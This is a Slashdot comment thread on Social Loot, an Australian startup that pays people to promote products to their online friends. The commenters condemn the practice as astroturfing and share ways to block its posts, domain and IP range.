Working on it. First thing to fix: the search engine. I think Google has gotten all the money they are possibly going to get at this point from overlooking SEOs, and should start delisting all of them immediately. Ask the founders to try and find something using their own search engine; when they find it littered with ads, perhaps they will feel motivated to find a way to fix it.
On a separate note, I've been equally annoyed about the Web 2.0, sell your Facebook friends, kind of thing. I have a few friends w
Re: (Score:3)
Re: (Score:2)
I don't really use Facebook so I can't give you a specific guide but you can just filter out all that stuff so only 'real' posts appear on your page.
on a totally unrelated unbiased note (Score:5, Funny)
Social Loot has the best service to offer so far. We testet all the available options besides Social Loot and Social Loot is the winner for us. Social Loot.
Re: (Score:2, Redundant)
+5 Funny
Re:on a totally unrelated unbiased note (Score:5, Insightful)
Re: (Score:2)
Ah, excellent... (Score:5, Insightful)
With any luck, this should allow automated recognition of people who are astroturfing for these guys and it's always good to have a new way of identifying awful people. At a service level, the astroturf can then be removed, downranked by search engines, etc. At a personal level, we can each do our part by reminding those culprits we know that spammers are abhuman scum who go to the special hell, and deserve it.
Re: (Score:2)
Re: (Score:2)
Not really, most of them will probably be companies you never would have heard of otherwise. This is probably going to work on the same principle as spam. They'll post a million shill messages and if they sell 4 of the product, it'll be consider a "success".
Ah-ha! (Score:2)
I was wondering why all my friends suddenly started trying to get me to buy a 747 with a big laser on it.
Re: (Score:2)
i would like a shark with a fricking laser on it.
sue them (Score:1)
So, is it age related or IQ related... (Score:2)
I can see it both ways - the youth will be jaded with familiarity about how the world works (wait - new patent idea = "how the worlds works + ON THE INTERNET") vs the wisdom of the more experienced... I don't have a good sample - my kids, are, well, young(er) AND smart, so I have confounding factors in my data points... but they don't believe half the shit on the Internet as it is. How old is the phrase "caveat empt
In Britain... (Score:5, Funny)
Re:In Britain... (Score:4, Funny)
In the US, we can call it 'Prostituting for Pennies'.
Re: (Score:2)
In Poland, we call it "Peddling for Pebbles".
Futurama new this day would come (Score:1)
Innovative new spam ideas! (Score:1)
Block It (Score:5, Informative)
I don't know about Twitter at least, but on Facebook, all the posts came from the Social Loot application. It took all of 5 seconds to "block all posts from Social Loot" to my wall, and now I need never know of its existence (except for Slashdot - thanks guys).
Re: (Score:1)
Re: (Score:1)
#
/etc/hosts
#
#
127.0.0.1 localhost twitter.com fb.com facebook.com
... ...
No more trust. (Score:4, Interesting)
Great. So now when a friend or acquaintance says something nice about a product or service, I won't be able to trust their opinion because I won't know if they were paid to say it or not.
Nice job polluting Twitter and other sites with stupid marketing and more distrust in what people say. It's freaking bad enough already.
Re: (Score:2)
If they are the kind of friend who would push products on you just because they are getting paid then you probably couldn't trust their opinion anyway. Now at least you know. The friends who give you a well reasoned recommendation or information about their personal experience with a product / service can probably be trusted. The 'friends' who send you a referrer link out of the blue probably can't.
Re: (Score:2)
I find it interesting that you would call someone you don't trust and know "friend."
The people I call "friend" (as opposed to what Facebook says) are trustworthy. I wouldn't hang around them if they weren't.
Re: (Score:2)
DOH!
Re: (Score:2)
You will be able to tell by looking at the address in the address bar after you have followed the link. If it is a standard product page link then great, if it has a load of referrer cruft tagged on to the end of it then you may want to take the recommendation with a pinch of salt.
At the end of the day you can either trust your friends and therefore be safe in the assumption that they have your best interests at heart, or you can't.
Re: (Score:2)
As mentioned earlier in this thread, there's an app
... erhm ... addon for that: Long URL Please Firefox Addon [mozilla.org]
Good for them! (Score:3)
If social media websites are making a mint off of harvesting personal information, it's high time their users started seeing some money as well.
It's up to the service providers to police their own services, and I feel no pity for them.
Cash for twits. (Score:2)
...are assigned companies to promote to their circle of online friends.
What a load of crap. "Go promote this crap you may or may not have used or like, and we'll pay you".
I know not everyone shares my belief on this, but the only way I'll endorse or promote your product is if I believe it's a good product and a good value. Mostly, that means I personally use your product and like it, but there are some cases where I know a product is good and popular, but doesn't serve my needs. In that case, I'll still recommend it to people I think will benefit from it. If I don't know your
Re: (Score:2)
I'd be willing to do this (Score:2)
I'd be willing to do this just as soon as I develop a new set of friends that I don't care about, so I don't have to lose the friends I actually like!
:)
Re: (Score:2)
Cash in no matter what? (Score:3)
Anything I write must tickle at least someone's fancy.
Either I like a product, it makes the company happy, or I don't like it, it makes their competition happy.
So either way, I should get my money right? No need to get influenced by money.
Can I cash in retrospectively for all the things I ever wrote? There must be a lot of money in there. Just need to pitch it to the right 'clients'. $_$
Quickly Squelched (Score:4, Insightful)
People have a very low tolerance personal space intrusions. People on the whole have a pretty decent intuition on whether someone genuinely is recommending something vs. is being paid to do so. People also have a pretty good intuition on figuring out who is a paid shill. Anyone who seriously tries to make money from this will quickly find themselves without friends. I can't think of a single friend of mine that would tolerate this shit on their feeds. I hope this gains traction as it will be a quick and easy way to thin out the online social circle.
If this catches on (it won't), you'll just end up with a circle of technically ignorant folks circle-jerking each other for ad revenue while the rest of us get on with our lives.
Let the advertisers know what you think (Score:5, Interesting)
I just emailed Minidisc Australia and Social Loot sales this email:
---
Hi guys
I'm a previous customer of yours (I purchased a Cowon J3 a couple of years ago, order no 40580), and previously I've recommended other people buy stuff from you.
I note that you are now using Social Loot advertising (having come across this company via slashdot post): [socialloot.com]
My opinion is that the kind of 'shill advertising' promoted by Social Loot is about as low as it gets. As a result, I will:
a) no longer be recommending you, in fact I will be recommending against purchasing from you (and will explain my reasoning regarding the use of Social Loot)
b) no longer consider you for future purchases for myself
I realise I'm just one person. However, I am the 'go to guy' for a number of relatives and friends for technology matters, and based on past experience I am pretty sure that this will cost you a sale every three months or so. Over the course of one year I would estimate lost revenue at AUS$500 - AUS$1000.
If you stop using Social Loot advertising I will be happy to reverse my decision on this matter. Please note I've also cced this email to the Social Loot sales email address - unlike them, and apparently you, I am fine with being honest about my opinions.
Regards
Mike Both
----
If enough people do this, it could make a difference.
Re: (Score:2)
However the old fart cynic in me says: Good luck competing with "A current affair" and "Today tonight" who have both been shilling these kind of "pocket money" schemes for at least a decade. Then there's "Australia's most read columnist", Andrew Bolt, a shill for God in an Akubra
This is obviously spam-for-hire (Score:5, Informative)
1. Block all email to/from socialloot.com. (This might need updating if they register additional domains to avoid blocking. A very common spammer tactic is to use sequentially numbered domains, e.g., example01.com, example02.com, example03.com.)
2. Firewall out 122.252.6.0/24. Make the block is bidirectional so that nobody on your network can reach their allocation. (This will probably need updating if they receive an additional allocation.)
3. If you run a DNSBL or RHSBL, list the domain and the network allocation. If you maintain a list of spammer/phisher/abuser domains, add the domain.
4. If you run an ISP or similar operation, make it a policy that any user participating in this scam will be terminated immediately. Same for mailing lists, web forums, newsgroups, etc.
5. Do not hire anyone who has ever worked for socialloot.com. Make sure that words spread that working for spammer Gary Munitz is toxic.
Profit (Score:2)
Why I left FB (Score:2)
This is one of the reasons I quit Facebook, and why I think FB will eventually tank. It won't be long before your wall ends up being nothing but dozens of "posts" from your friends breathlessly raving about cheese-stuffed-something-or-other, or toilet bowl cleaner. Because eventually, if you are on FB, everything you buy is going to be announced to all your FB friends in this way, whether you like it or not.
Re: (Score:2)
It won't be long before your wall ends up being nothing but dozens of "posts" from your friends breathlessly raving about cheese-stuffed-something-or-other, or toilet bowl cleaner.
If friends start barking ads, they'll soon find themselves friendless.
Regional word: spruiker (Score:2)
I'd never heard of a "spruiker" before. Had to google it. Still have no idea how to say it.
Re: (Score:2)
Re: (Score:2)
Financially desperate and/or greedy people who cling to the last delusion will always be attracted to the accountanting equivalent of perpetual motion.
Re: (Score:2)
"Hopefully this becomes widespread enough to inject enough noise into the signal that is Facebook's personally-focused ad targetting."
Neat experiment.
:) | https://news.slashdot.org/story/12/04/30/2353237/cash-for-tweets-and-facebook-posts-aussie-startup-pays-you-to-astroturf | CC-MAIN-2017-26 | refinedweb | 4,335 | 71.14 |
I am training my models from
Google Collab with
batch_size = 128 after 1 epoch it has this problem. I don’t know have to fix it with the same batch_size (reduce batch_size to 32 can avoid this problem). Here is Colab spec:
driver Version: 460.32.03 CUDA Version: 11.2
You can find my notebook here.
Thanks for your help.
RuntimeError: CUDA error: CUBLAS_STATUS_INVALID_VALUE when calling `cublasSgemm( handle, opa, opb, m, n, k, &alpha, a, lda, b, ldb, &beta, c, ldc)`
I am training my models from
It seems that one of your operands is too large to fit in int32 (or negative, but that seems unlikely).
I thought that recent PyTorch will give a better error (but don’t work around it):
import torch LARGE = 2**31+1 for i, j, k in [(1, 1, LARGE), (1, LARGE, 1), (LARGE, 1, 1)]: inp = torch.randn(i, k, device="cuda", dtype=torch.half) weight = torch.randn(j, k, device="cuda", dtype=torch.half) try: torch.nn.functional.linear(inp, weight) except RuntimeError as e: print(e) del inp del weight
at::cuda::blas::gemm<float> argument k must be non-negative and less than 2147483647 but got 2147483649 at::cuda::blas::gemm<float> argument m must be non-negative and less than 2147483647 but got 2147483649 at::cuda::blas::gemm<float> argument n must be non-negative and less than 2147483647 but got 2147483649
But they don’t work around it. (It needs a lot of memory to trigger the bug…)
Maybe you can get a credible backtrace and record the input shapes to the operation that fails.
Best regards
Thomas
So what can I do to solve this problem, I just know to change batch size to smaller.
In order of difficulty:
- make batch size smaller,
- make a minimal reproducing example (i.e. just two or three inputs from torch.random and the call to the torch.nn.functional.linear) and file a bug,
- hot-patch torch.nn.functional.linear with a workaround (splitting the operation into multiple linear or matmul calls),
- submit a PR with a fix in PyTorch and discuss whether you can add a test or whether it’d take a prohibitive large amount of GPU memory to run (or hire someone to do so).
Best regards
Thomas
Thank for your help.
For the peoples getting this error and ending up on this post, please know that it can also be caused if you have a mismatch between the dimension of your input tensor and the dimensions of your nn.Linear module. (ex. x.shape = (a, b) and nn.Linear(c, c, bias=False) with c not matching)
It is a bit sad that pytorch don’t give a more explicit error messages.
@Jeremy_Cochoy This was really helpful. Solved my issue.
@Jeremy_Cochoy Thanks for your comments!
@Jeremy_Cochoy Thanks!
Hello @Jeremy_Cochoy
I have added an nn.Linear(512,10) layer to my model and the shape of the input that goes into this layer is torch.Size([32,512,1,1]). I have tried reducing the batch size from 128 to 64 and now to 32, but each of these gives me the same error.
Any idea what could be going wrong?
I think you want to transpose the dimensions of your input tensor before and after (Linear — PyTorch 1.9.0 documentation say it expect a Nx*xC_in tensor and you give him a 32x…x1 tensor)
Something like
linear(x.transpose(1,3)).transpose(1,3) ?
Thanks a lot also solved my Issue!
I got the same error because of a mismatch of the input dimensions in the first layer.
Thanks for the hint!
helped me! thank you!
hello all,
I had this problem while I was using a smaller batch size (=4) for testing some code changes, while my initial batch size was 64. I checked the shapes for
nn.Linear and they matched
After 1 hour I found that the only change was the batch size. By increasing batch size back to 64 everything worked perfectly. Pytorch version 1.8.1. Not sure why this error is caused.
Hope it helps!
Thanks a lot! Solved my issue. | https://discuss.pytorch.org/t/runtimeerror-cuda-error-cublas-status-invalid-value-when-calling-cublassgemm-handle-opa-opb-m-n-k-alpha-a-lda-b-ldb-beta-c-ldc/124544 | CC-MAIN-2022-27 | refinedweb | 695 | 74.39 |
Java - two types of data types in Java which are categorized below:
- Primitive Data Types: This includes boolean, char, byte, short, int, long, float and double.
- Non-primitive Data Types: This includes String, Interfaces, Classes etc.
Primitive Data Types
The below table describes primitive data types of Java in detail:
The below example shows how to create different primitive data types in a Java program.
public class MyClass { public static void main(String[] args) { boolean i = true; char j = 'A'; byte k = 10; short l = 10; int m = 10; long n = 10L; float o = 10.5f; double p = 10.5d; //printing data types System.out.println("i is a boolean. i = " + i); System.out.println("j is a char. j = " + j); System.out.println("k is a byte. k = " + k); System.out.println("l is a short. l = " + l); System.out.println("m is an int. m = " + m); System.out.println("n is a long. n = " + n); System.out.println("o is a float. o = " + o); System.out.println("p is a double. p = " + p); } }
The output of the above code will be:
i is a boolean. i = true j is a char. j = A k is a byte. k = 10 l is a short. l = 10 m is an int. m = 10 n is a long. n = 10 o is a float. o = 10.5 p is a double. p = 10.5 | https://www.alphacodingskills.com/java/java-data-types.php | CC-MAIN-2021-04 | refinedweb | 233 | 72.83 |
William Steele1,739 Points
Instantiation
How do I declare the frog class and give it a name at the same time, tried doing it the way it showed in video but said it was wrong and have been messing around but not finding anything
namespace Treehouse.CodeChallenges { class Program { static void Main() { new Frog == Frog 'mike' } } }
namespace Treehouse.CodeChallenges { class Frog{} }
2 Answers
Antonio De Rose20,859 Points
namespace Treehouse.CodeChallenges { class Program { static void Main() { new Frog == Frog 'mike' //when you want to instantiate a class //class instancevariable = new kewyword class(), this will lead to the below //questions asks you to use the mike word for the instance variable //Frog mike = new Frog(); } } }
Ed H-P2,557 Points
William,
I had the same issue as you, and found the answer by removing a sneaky space I had between my class Frog and the (); , after I defined the new variable.
e.g. this was wrong: Frog mike = new Frog ();
but I removed the final space and Treehouse let me have it. My initial method was still valid, but not 100% grammatically/typographically correct.
:) | https://teamtreehouse.com/community/instantiation-2 | CC-MAIN-2020-05 | refinedweb | 183 | 58.96 |
FA GDAL with libcurl support?
- How can i add particular LDFLAGS with GDAL < 1.5
- I am having problem building with external libraries, where can I look?
- What is GDAL_DATA environment variable?
- How to set GDAL_DATA variable?
Where can I find development version of GDAL?
You can checkout it directly from SVN repository. Visit Downloading GDAL/OGR Source Wiki page for detailed instructions.
Can I get a MS Visual Studio Project file for GDAL?
The GDAL developers find it more convenient to build with makefiles and the Visual Studio NMAKE utility. Maintaining a parallel set of project files for GDAL is too much work, so there are no full project files directly available from the maintainers.
There are very simple project files available since GDAL/OGR 1.4.0 that just invoke the makefiles for building, but make debugging somewhat more convenient. These are the makegdal71.vcproj and makegdal80.vcproj files in the GDAL root directory. See Using Makefile Projects for details.
Occasionally other users do prepare full project files, and you may be able to get them by asking on the gdal-dev list. However, I would strongly suggest you just use the NMAKE based build system. With debugging enabled you can still debug into GDAL with Visual Studio.
Can I build GDAL with MS Visual C++ 2008 Express Edition?
Yes, since at least GDAL/OGR 1.5 this should be straight forward. Before proceeding with the normal NMAKE based build just ensure that the MSVC_VER macro near the top of gdal/nmake.opt is changed to 1500 to reflect the compiler version (Visual C++ 9.0). This will modify the build to skip the VB6 interfaces which depend on ATL components not available in the express edition.
Microsoft Express Edition Downloads
Can I build GDAL with MS Visual C++ 2005 Express Edition?
Yes, you can. It's also possible to use GDAL libraries in applications developed using Microsoft Visual C++ 2005 Express Edition.
- Download and install Visual C++ 2005 Express Edition. Follow instructions presented on this website:
- Download and install Microsoft Platform SDK. Also, follow these instructions carefully without omitting any of steps presented there:
- Add following two paths to Include files in the Visual C++ IDE settings. Do it the same way as presented in Step 3 from the website above.
C:\\Program Files\\Microsoft Platform SDK\\Include\\atl C:\\Program Files\\Microsoft Platform SDK\\Include\\mfc
- Since you will build GDAL from command line using nmake tool, you also need to set or update INCLUDE and LIB environment variables manually. You can do it in two ways:
- using the System applet available in the Control Panel
- by editing vsvars32.bat script located in
C:\Program Files\Microsoft Visual Studio 8\Common7\Tools\vsvars32.bat
These variables should have following values assigned:
INCLUDE=C:\\Program Files\\Microsoft Visual Studio 8\\VC\\Include; C:\\Program Files\\Microsoft Platform SDK\\Include; C:\\Program Files\\Microsoft Platform SDK\\Include\\mfc; C:\\Program Files\\Microsoft Platform SDK\\Include\\atl;%INCLUDE% LIB=C:\\Program Files\\Microsoft Visual Studio 8\\VC\\Lib; C:\\Program Files\\Microsoft Visual Studio 8\\SDK\\v2.0\\lib; C:\\Program Files\\Microsoft Platform SDK\\lib;%LIB%
NOTE: If you have edited system-wide INCLUDE and LIB variables, using System applet, every Console (cmd.exe) will have it properly set. But if you have edited them through vsvars32.bat script, you will need to run this script in the Console before every compilation.
- Patch atlwin.h header
At line 1725 add int i; declaration, so it looks as follows:
BOOL SetChainEntry(DWORD dwChainID, CMessageMap* pObject, DWORD dwMsgMapID = 0) { int i; // first search for an existing entry for(i = 0; i < m_aChainEntry.GetSize(); i++)
- Patch atlbase.h header
At line 287, comment AllocStdCallThunk? and FreeStdCallThunk? functions and add macros replacements:
/***************************************************") ***************************************************/ /* NEW MACROS */ #define AllocStdCallThunk() HeapAlloc(GetProcessHeap(),0,sizeof(_stdcallthunk)) #define FreeStdCallThunk(p) HeapFree(GetProcessHeap(), 0, p)
- Building GDAL
- Open console windows (Start -> Run -> cmd.exe -> OK)
- If you have edited vsvars32.bat script, you need to run it using full path:
C:\> "C:\\Program Files\\Microsoft Visual Studio 8\\Common7\\Tools\\vsvars32.bat" Setting environment for using Microsoft Visual Studio 2005 x86 tools
- Go to GDAL sources root directory, for example:
C:\> cd work\gdal
- Run nmake to compile
C:\work\gdal> nmake /f makefile.vc
- If no errors occur, after a few minutes you should see GDAL libraries in C:\work\gdal.
Now, you can use these libraries in your applications developed using Visual C++ 2005 Express Edition.
Can I build GDAL with Cygwin or MinGW?
GDAL should build with Cygwin using the Unix-like style build methodology. It is also possible to build with MinGW and MSYS though there might be complications. The following might work:
./configure --prefix=$PATH_TO_MINGW_ROOT --host=mingw32 \ --without-libtool --without-python $YOUR_CONFIG_OPTIONS
Using external win32 libraries will often be problematic with either of these environments - at the least requiring some manual hacking of the GDALmake.opt file.
Howto compile the (NG) Python bindings:
cd swig\python python setup.py build -c mingw32 cp build\lib.win32-2.5\* c:\python25\lib\site-packages\
(some details may need adjusting)
Howto compile the Perl bindings:
cd swig\perl perl Makefile.PL make.bat make.bat install
(the perl may need to be compiled with MinGW)
If you have swig, the bindings can be regenerated in MSYS prompt by command "make generate".
Can I build GDAL with Borland C or other C compilers?
These are not supported compilers for GDAL; however, GDAL is mostly pretty generic, so if you are willing to take on the onerous task of building an appropriate makefile / project file it should be possible. You will find most portability issues in the gdal/port/cpl_port.h file and you will need to prepare a gdal/port/cpl_config.h file appropriate to your platform. Using cpl_config.h.vc as a guide may be useful.
Why Visual C++ 8.0 fails with C2894 error in wspiapi.h when building GDAL with libcurl support?
Here is the complete error message of this issue:
C:\Program Files\Microsoft Visual Studio 8\VC\PlatformSDK\include\wspiapi.h(44) : error C2894: templates cannot be declared to have 'C' linkage
This is a known bug in the wspiapi.h header. One of possible solutions is to manually patch curl.h replacing lines 153 - 154
#include <winsock2.h> #include <ws2tcpip.h>
with the following code:
#ifdef __cplusplus } #endif #include <winsock2.h> #include <ws2tcpip.h> #ifdef __cplusplus extern "C" { #endif
This problem occurs in libcurl <= 7.17.1. Perhaps, later versions of libcurl will include this fix.
How can i add particular LDFLAGS with GDAL < 1.5
export the LNK_FLAGS variable with your habitual LDFLAGS content
export LNK_FLAGS=-Wl,-rpath=/foo/lib -l/foo/lib
I am having problem building with external libraries, where can I look?
There are additional hints and suggestions for building GDAL with various external support libraries in the BuildHints topic.
What is GDAL_DATA environment variable?
GDAL_DATA is an environment variable used to specify location of supporting files used by GDAL library as well as GDAL and OGR utilities. For instance, in order for OGR and GDAL to properly evaluate EPSG codes you need to have the EPSG support files (so called dictionaries, mostly in CSV format), like gcs.csv and pcs.csv, found in the directory pointed by GDAL_DATA variable.
How to set GDAL_DATA variable?
On Linux, assuming gdal/data supporting files are installed under /usr/local/share/gdal/data and Bash-like shell, export the variable as follows:
$ export GDAL_DATA=/usr/local/share/gdal
Refer to manual of your shell to learn how to set the GDAL_DATA variable permanently.
On Windows, assuming supporting files are located under C:\GDAL\data, in order to set the variable in current console session:
C:\> set GDAL_DATA=C:\GDAL\data
It's also possible to set GDAL_DATA variable permanently, as system-wide variable, so it's always available. Follow the instructions of How To Manage Environment Variable guide.. | http://trac.osgeo.org/gdal/wiki/FAQInstallationAndBuilding | CC-MAIN-2017-04 | refinedweb | 1,328 | 58.18 |
Hi,
I have a question on behaviour I'm seeing POSTing docs to the database but then not always
being able to immediately GET them. Generally it takes 2 attempts for a successful fetch.
I had assumed a POST is synchronous and document would then be immediately available.
Not sure if it makes a difference, delayed_commits is set to false currently. Though I've
tried both settings. I've looked at couch's durability matrix page and also assumed that is
outside the scope of this.
Thanks, Matt
>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Example output:
PUT '
Updating Key: test-key Response: 201
GET '
Getting Key: test-key Response: 404
PUT '
Updating Key: test-key Response: 201
GET '
Getting Key: test-key Response: 200
Taken 2 attempts to create.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
{
println "Loading key: ${key}"
put(key, json)
def attempts = 1
while (!get(key)) {
attempts++
Thread.sleep(100);
put(key, json)
}
println "Taken ${attempts} attempts to create."
}
def put(String key, json) {
def params = [path: "/keys/${key}", body: json]
def response = client.put(params)
println "Updating Key: ${key} Response: ${response.status}"
}
def get(String key) {
def params = [path: "/keys/${key}"]
def response = client.get(params).data
println "Getting API Key: ${apiKey} Response: ${response.status}"
return response.data
}
________________________________
This email (including any attachments) is confidential and may be privileged. If you have
received it in error, please notify the sender by return email and delete this message from
your system. Any unauthorised use or dissemination of this message in whole or in part is
strictly prohibited. Please note that emails are susceptible to change and we will not be
liable for the improper or incomplete transmission of the information contained in this communication
nor for any delay in its receipt or damage to your system. We do not guarantee that the integrity
of this communication has been maintained nor that this communication is free of viruses,
interceptions or interference. | http://mail-archives.apache.org/mod_mbox/couchdb-user/201207.mbox/%3C4FF38556.1080303@wotifgroup.com%3E | CC-MAIN-2014-41 | refinedweb | 311 | 56.96 |
python 3x - assigning an automatically generated tkinterttklabel type variable to an array and retrieving it
I assigned an automatically generated tkinter.ttk.Label type variable to the array, and then assigned the automatically generated variable to the array to make it easier to handle later, but somehow the variable assigned to the array It has become a list typeError message
Applicable source codeApplicable source code
Traceback (most recent call last): File "address here", line 20, in<module> gui [i] .pack () AttributeError: 'list' object has no attribute 'pack'
TriedTried
from tkinter import Tk, ttk, PhotoImage root = Tk () img001 = PhotoImage (file = '# Image address here') # Display test label = ttk.Label (root, image = img001) label.pack () gui = [] # Automatically generate and assign to array for i in range (10): locals () ["t_% d"% i] = ttk.Label (root, image = img001) gui.append (["t_% d"% i]) # Direct display of one of the automatically generated variables t_5.pack () #Type confirmation print (type (t_5)) # here tkinter.ttk.Label type print (gui) print (gui [5]) print (type (gui [5])) # list type here #Display variables assigned to array for i in range (10): gui [i] .pack () # Error here
I tried adding locals () in front of the gui array, but I got an invalid syntax error. . I wonder what I should do sweat
Please give me a solution ...
- Answer # 1
- Answer # 2
Cause
Incorrect:
gui.append (["t_% d"% i])
Correct:
gui.append (locals () ["t_% d"% i])
If you write in error, the value that is appended will be a "list with str as element" like
["t_0"]. The previous line assignment statement is
Is it
locals () ["t_% d"% i] = ttk.Label (root, image = img001)
? This is for example when i is 0
It has the same meaning as described as
t_0 = ttk.Label (root, image = img001)
. The value to be added as an element of gui is the left side of this assignment statement, that is, the variable
t_0(or
locals () ["t_% d"% i])
If you do not write
gui.append (t_0)... (A)
Or
gui.append (locals () ["t_% d"% i])... (B)
, the meaning will change. In the actual code, i is substituted while changing i in the loop, so it is necessary to write (B) instead of (A).Personal opinion (dynamic access of
localvariables by locals)
Since we want to access multiple instances of Label like "i-th label", we treat it as a list, and such things as
local variable through locals (). I think that the following code is sufficient.
from tkinter import Tk, ttk, PhotoImage root = Tk () img001 = PhotoImage (file = 'img001.png') gui = [] # Create multiple labels (and store them as list elements) for i in range (10): # No need to create local variables t_0, t_1 etc. using locals gui.append (ttk.Label (root, image = img001)) # place all labels stored in list in order for i in range (10): gui [i] .pack () root.mainloop ()
Snacks:
(1) The value type of variable gui is not an array but a list. There is nothing wrong with saying an array, but it is inaccurate.
(2) In the current code, the gui element is a label. Variable names seem more natural than labels, such as gui.
(3) Strictly speaking, pack is a function to "place" a widget instead of "display".
(Since it will be displayed as a result of placement, I will not say it is a mistake)
(4) The original code uses full-width
#to indicate a comment. It may have been the intention to use full-width (?) Consciousness that `` use half-width # will be a headline in the StackOverflow markdown specification '', but inside the markdown for code such as There is no need to worry about it, so please write it in
#according to the Python specification. Otherwise, it will be very troublesome for viewers to copy and paste. If you don't rewrite full-width
#to half-width
#, you will get a syntax error ...
Addition: I noticed the inadequacy of my answer in the comment section of hayataka2049's answer.
Dynamic creation of local variables is not possible with
locals () [variable name] = value.
However, if you use
locals ()in the global scope, the result is a dict object that represents the global variable namespace (and the global variable namespace is the responsibility of the dict object itself). Dynamic generation of is possible. But in the first place
locals () [variable name] = valueshould be used instead of
globals () [variable name] = valuethink. In any case, the necessity of using "dynamic generation of variables" is as it was commented in the first answer that it is not necessary in this case.
Related articles
- python - i want to answer questions automatically in google classroom, but i can't use the api please give me some advice
- macos (osx) - code is not automatically generated when adding a view controller in xamarinmac
- python - i want to automatically answer microsoft froms using selenium
- python - about assigning values to fields with foreign keys in django
- python chord i want to display a spectrogram of the generated sound
- python - i want to automatically log in to soundcloud
- html - the reason why name and id are automatically generated when rails file_field is used
- about python randomly generated bubble sort
- python 3x - python i want to create a message box that closes automatically
- python - i want to automatically delete the backed up files after a few days
- i want to automatically generate a password with python and record it in a text file
- python - i want to automatically enter a value in create view of django
- think too hard.
Do not try locals () or dynamic variable name generation, because the code looks bad and immediately causes strange behavior. | https://www.tutorialfor.com/questions-100877.htm | CC-MAIN-2020-40 | refinedweb | 932 | 60.45 |
L.
Accept the node.
Interrupt the normal processing of the document.
Reject the node and its children.
Skip this single node. The children of this node will still be considered.
This method will be called by the parser at the completion of the
parsing of each node. The node and all of its descendants will exist
and be complete. The parent node will also exist, although it may be
incomplete, i.e. it may have additional children that have not yet
been parsed. Attribute nodes are never passed to this function.
From within this method, the new node may be freely modified - children may be added or removed, text nodes modified, etc. The state of the rest of the document outside this node is not defined, and the affect of any attempt to navigate to, or to modify any other part of the document is undefined.
For validating parsers, the checks are made on the original document, before any modification by the filter. No validity checks are made on any document modifications made by the filter.
If this new node is rejected, the parser might reuse the new node and any of its descendants..
Tells the
LSParser what types of nodes to show to the
method
LSParserFilter.acceptNode. If a node is not shown
to the filter using this attribute, it is automatically included in
the DOM document being built. See
NodeFilter for
definition of the constants. The constants
SHOW_ATTRIBUTE
,
SHOW_DOCUMENT,
SHOW_DOCUMENT_TYPE,
SHOW_NOTATION,
SHOW_ENTITY, and
SHOW_DOCUMENT_FRAGMENT are meaningless here. Those nodes
will never be passed to
LSParserFilter.acceptNode.
The constants used here are defined in [DOM Level 2 Traversal and Range] .
The parser will call this method after each
Element start
tag has been scanned, but before the remainder of the
Element is processed. The intent is to allow the
element, including any children, to be efficiently skipped. Note that
only element nodes are passed to the
startElement
function.
The element node passed to
startElement for filtering
will include all of the Element's attributes, but none of the
children nodes. The Element may not yet be in place in the document
being constructed (it may not have a parent node.)
A
startElement filter function may access or change
the attributes for the Element. Changing Namespace declarations will
have no effect on namespace resolution by the parser.
For efficiency, the Element node passed to the filter may not be the same one as is actually placed in the tree if the node is accepted. And the actual node (node object identity) may be reused during the process of reading in and filtering a document.. | http://developer.android.com/reference/org/w3c/dom/ls/LSParserFilter.html | CC-MAIN-2014-52 | refinedweb | 434 | 65.42 |
PARITY CONDITIONS: IRP, PPP, IFE, EH & RW

Arbitrage in FX Markets

Arbitrage Definition
It is an activity that takes advantage of pricing mistakes in financial instruments in one or more markets. It involves no risk and no capital of your own. There are 3 kinds of arbitrage:
(1) Local (sets uniform rates across banks)
(2) Triangular (sets cross rates)
(3) Covered (sets forward rates)
Note: The definition presents the ideal view of (riskless) arbitrage. “Arbitrage,” in the real world, involves some risk. We’ll call this arbitrage pseudo arbitrage.
Local Arbitrage (One good, one market)
Example: Suppose two banks have the following bid-ask FX quotes:
           Bank A (bid-ask)    Bank B (bid-ask)
USD/GBP    1.50 - 1.51         1.53 - 1.55
Sketch of Local Arbitrage strategy:
(1) Borrow USD 1.51
(2) Buy a GBP from Bank A
(3) Sell GBP to Bank B
(4) Return USD 1.51 and make a USD .02 profit (1.32% per USD borrowed)
Note I: All steps should be done simultaneously. Otherwise, there is risk! (Prices might change).
Note II: Bank A and Bank B will notice a book imbalance. Bank A will see all activity at the ask side (buy GBP orders) and Bank B will see all the activity at the bid side (sell GBP orders). They adjust the quotes. For example, Bank A can increase the ask quote to 1.54 USD/GBP. ¶
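A minimal Python sketch of the two-bank example (the quotes are the hypothetical ones above; the function name is ours, not part of any library):

```python
# Local arbitrage: buy GBP at Bank A's ask, sell GBP at Bank B's bid.
bank_a_ask = 1.51   # USD/GBP price to BUY GBP from Bank A
bank_b_bid = 1.53   # USD/GBP price to SELL GBP to Bank B

def local_arbitrage_profit(ask_buy, bid_sell):
    """USD profit from borrowing just enough to buy 1 GBP."""
    borrowed = ask_buy                     # step (1): borrow USD
    gbp_bought = borrowed / ask_buy        # step (2): buy GBP at the ask
    usd_received = gbp_bought * bid_sell   # step (3): sell GBP at the bid
    return usd_received - borrowed         # step (4): repay the loan

profit = local_arbitrage_profit(bank_a_ask, bank_b_bid)
print(round(profit, 4))                     # 0.02 (USD)
print(round(profit / bank_a_ask * 100, 2))  # 1.32 (% per USD borrowed)
```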
Triangular Arbitrage (Two related goods, one market)
Example: Suppose Bank One gives the following quotes:
St = 100 JPY/USD
St = 1.60 USD/GBP
St = 140 JPY/GBP
Take the first two quotes. Then, the no-arbitrage JPY/GBP quote should be SNAt = 160 JPY/GBP
At St = 140 JPY/GBP, Bank One undervalues the GBP against the JPY (with respect to the first two quotes). <= This is the pricing mistake!
Sketch of Triangular Arbitrage (Key: Buy undervalued GBP with the overvalued JPY):
(1) Borrow USD 1
(2) Sell the USD for JPY 100 (at St = 100 JPY/USD)
(3) Sell the JPY for GBP (at St = 140 JPY/GBP). Get GBP 0.7143
(4) Sell the GPB for USD (at St = 1.60 USD/GBP). Get USD 1.1429
=> Profit: USD 0.1429 (14.29% per USD borrowed).
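The triangular example can be checked the same way (a sketch using the example's quotes; helper names are ours):

```python
# Triangular arbitrage using Bank One's (mistaken) quotes from the example.
s_jpy_usd = 100.0   # JPY/USD
s_usd_gbp = 1.60    # USD/GBP
s_jpy_gbp = 140.0   # JPY/GBP (undervalues the GBP: no-arbitrage cross is 160)

cross_rate = s_jpy_usd * s_usd_gbp   # implied no-arbitrage JPY/GBP quote

def triangular_profit(jpy_usd, usd_gbp, jpy_gbp, usd_borrowed=1.0):
    """USD profit from the loop USD -> JPY -> GBP -> USD."""
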